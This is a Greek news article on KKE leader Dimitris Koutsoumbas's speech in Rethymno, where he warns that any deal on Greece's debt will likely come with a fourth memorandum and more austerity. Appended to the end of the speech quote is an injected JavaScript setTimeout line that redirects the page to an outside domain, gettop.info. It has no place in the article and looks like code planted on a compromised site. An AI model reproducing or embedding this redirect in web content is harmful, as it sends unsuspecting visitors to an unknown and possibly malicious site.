Κουτσούμπας: Η όποια συμφωνία για το χρέος πιθανά θα συνοδεύεται από 4ο μνημόνιο

0
3

 

Από το Ρέθυμνο όπου βρίσκεται για την κομματική συγκέντρωση του ΚΚΕ ο γγ της ΚΕ του κόμματος Δημήτρης Κουτσούμπας κάλεσε τους πολίτες και τους εργαζομένους να βάλουν τέρμα στο σύστημα που «αναπόφευκτα γεννά την εκμετάλλευση, τις κρίσεις και τους πολέμους και να κατευθύνουν τις μαχόμενες δυνάμεις στην ανατροπή του καπιταλισμού και στην οικοδόμηση της νέας σοσιαλιστικής κοινωνίας.

Ο κύριος Κουτσούμπας επανέλαβε την άποψή του ότι η όποια συμφωνία για το χρέος θα συνοδευτεί από νέα μέτρα. Στην ομιλία του ο γραμματέας της ΚΕ του ΚΚΕ επεσήμανε χαρακτηριστικά:

«Όσο για το ζήτημα του χρέους, που αποτελεί σημείο αντιπαράθεσης ανάμεσα στις ΗΠΑ και τη Γερμανία, επιβεβαιώθηκε ότι η όποια διευθέτηση, που πιθανά να προκύψει ως συμβιβασμός ανάμεσα στην ΕΕ και το ΔΝΤ, θα συνοδευτεί με πλήρη και απαρέγκλιτη εφαρμογή των αντιλαϊκών μέτρων και πιθανά με ένα νέο 4ο μνημόνιο που θα φορτωθεί μαζί με τα προηγούμενα στις πλάτες του λαού. Φυσικά η όποια συμφωνία για το χρέος δεν θα αφορά την ανακούφιση του ελληνικού λαού, αλλά τη δυνατότητα επιδότησης των επιχειρηματικών ομίλων και των επενδύσεων του κεφαλαίου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here